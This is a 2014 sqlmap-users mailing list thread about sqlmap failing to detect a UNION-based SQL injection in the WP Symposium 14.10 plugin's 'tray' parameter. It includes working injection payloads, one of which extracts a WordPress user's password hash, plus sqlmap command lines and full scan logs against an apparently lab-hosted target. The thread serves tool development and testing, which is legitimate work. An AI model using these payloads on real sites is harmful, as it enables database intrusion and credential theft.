Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
From: Miroslav S. <mir...@gm...> - 2014-12-15 20:39:33
Looking into traffic file I don't see "obvious" trails of SQLi. If you are satisfied with your findings I won't look any further.

Bye

On Mon, Dec 15, 2014 at 6:55 PM, Brandon Perry <bpe...@gm...> wrote:
>
> Aha, I got it:
>
> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5 --risk=3 -o
>     _
>  ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 09:54:50
>
> [09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
> [09:54:50] [INFO] setting file for logging HTTP traffic
> [09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of its incompatibility with HTTP(s) proxy
> [09:54:50] [INFO] testing connection to the target URL
> [09:54:50] [INFO] heuristics detected web page charset 'ascii'
> [09:54:50] [WARNING] heuristic (basic) test shows that POST parameter 'tray' might not be injectable
> [09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
> [09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [09:54:51] [WARNING] reflective value(s) found and filtering out
> [09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
> [09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
> [09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random number) - 1 to 10 columns' injectable
> POST parameter 'tray' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
> sqlmap identified the following injection points with a total of 26 HTTP(s) requests:
> ---
> Parameter: tray (POST)
>     Type: UNION query
>     Title: MySQL UNION query (random number) - 1 column
>     Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
> ---
> [09:55:02] [INFO] testing MySQL
> [09:55:02] [INFO] confirming MySQL
> [09:55:03] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Apache 2.4.7, PHP 5.5.9
> back-end DBMS: MySQL >= 5.0.0
> [09:55:03] [INFO] fetched data logged to text files under '/home/bperry/.sqlmap/output/172.31.16.26'
>
> [*] shutting down at 09:55:03
>
> bperry@ubuntu:~/tools/sqlmap$
>
>
> On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <bpe...@gm...> wrote:
>>
>> Sorry, one more thing to note, the following command gets very close to exploiting the injection:
>>
>> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>>
>> The only problem is that the union-char is 'f', when I was hoping it would be 0x66. When I capture the request and replace 'f' with 0x66, the injection works. Looks like ' is a bad char.
>>
>> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <bpe...@gm...> wrote:
>>>
>>> Playing with the queries sqlmap sends a bit more:
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>>
>>> This results in a 0 being returned where the password hash was in the successful injection:
>>>
>>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>>>         ^ injection result
>>>
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>>
>>> This payload also results in a 0 being returned, not 'fdsa' as you would expect.
>>>
>>> However, this payload does return 'fdsa'
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#&mid=1
>>>
>>> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#[split]
>>>
>>>
>>> Hope this helps.
>>>
>>>
>>> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <bpe...@gm...> wrote:
>>>>
>>>> Here is the console output. Attached is the traffic log in a zip:
>>>>
>>>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>>>     _
>>>>  ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
>>>> |_ -| . | |     | .'| . |
>>>> |___|_  |_|_|_|_|__,|  _|
>>>>       |_|           |_|   http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>>>
>>>> [*] starting at 08:56:27
>>>>
>>>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>>>> [08:56:27] [INFO] setting file for logging HTTP traffic
>>>> [08:56:27] [INFO] flushing session file
>>>> [08:56:27] [INFO] testing connection to the target URL
>>>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>>>> [08:56:27] [INFO] testing if the target URL is stable. This can take a couple of seconds
>>>> [08:56:28] [INFO] target URL is stable
>>>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter 'tray' might not be injectable
>>>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>>>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>>>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>>>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
>>>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
>>>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
>>>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
>>>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
>>>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
>>>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
>>>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
>>>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
>>>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
>>>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
>>>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
>>>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
>>>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>>>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
>>>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
>>>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
>>>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
>>>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
>>>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
>>>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
>>>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
>>>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
>>>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)'
>>>> [08:58:08] [INFO] testing 'MySQL inline queries'
>>>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
>>>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
>>>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
>>>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
>>>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>>>> [08:58:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
>>>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1 columns
>>>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
>>>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>>>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
>>>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>>>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
>>>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>>>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
>>>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
>>>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
>>>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
>>>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
>>>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
>>>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
>>>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
>>>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
>>>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
>>>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
>>>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
>>>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
>>>> [08:58:54] [INFO] checking if the injection point on POST parameter 'tray' is a false positive
>>>> POST parameter 'tray' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
>>>> sqlmap identified the following injection points with a total of 2049 HTTP(s) requests:
>>>> ---
>>>> Parameter: tray (POST)
>>>>     Type: AND/OR time-based blind
>>>>     Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>>>>     Payload: action=getMailMessage&tray=in_deleted AND 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>>>> ---
>>>> [08:59:48] [INFO] testing MySQL
>>>> [08:59:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
>>>> do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
>>>> [08:59:51] [INFO] confirming MySQL
>>>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response times
>>>> [08:59:53] [INFO] the back-end DBMS is MySQL
>>>> web server operating system: Linux Ubuntu
>>>> web application technology: Apache 2.4.7, PHP 5.5.9
>>>> back-end DBMS: MySQL >= 5.0.0
>>>> [08:59:53] [INFO] fetched data logged to text files under '/home/bperry/.sqlmap/output/172.31.16.26'
>>>>
>>>> [*] shutting down at 08:59:53
>>>>
>>>> bperry@ubuntu:~/tools/sqlmap$
>>>>
>>>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>
>>>>> Hi.
>>>>>
>>>>> I don't see a reason why this form of UNION test would be any different than the regular used by sqlmap. Can you please send me the traffic file for such run (... --flush-session -t traffic.txt) along with console output?
>>>>>
>>>>> Bye
>>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...> wrote:
>>>>>
>>>>>> Hello!
>>>>>>
>>>>>> Playing around with the following vulnerability:
>>>>>>
>>>>>> http://www.exploit-db.com/exploits/35505/
>>>>>>
>>>>>>
>>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does result in a response from the server with the hash of the first user:
>>>>>>
>>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>>>
>>>>>>
>>>>>> However, sqlmap only finds a time based injection. Looking at sqlmap through burp, I do see sqlmap doesn't try an injection syntax like the one used in the PoC. It may be useful to add a syntax of UNION (SELECT CONCAT(blah, blah, blah) FROM blah).
>>>>>>
>>>>>> Just a thought!
>>>>>>
>>>>>>
>>>>>> --
>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>> http://www.volatileminds.net -- website
>>>>>>

--
Miroslav Stampar
http://about.me/stamparm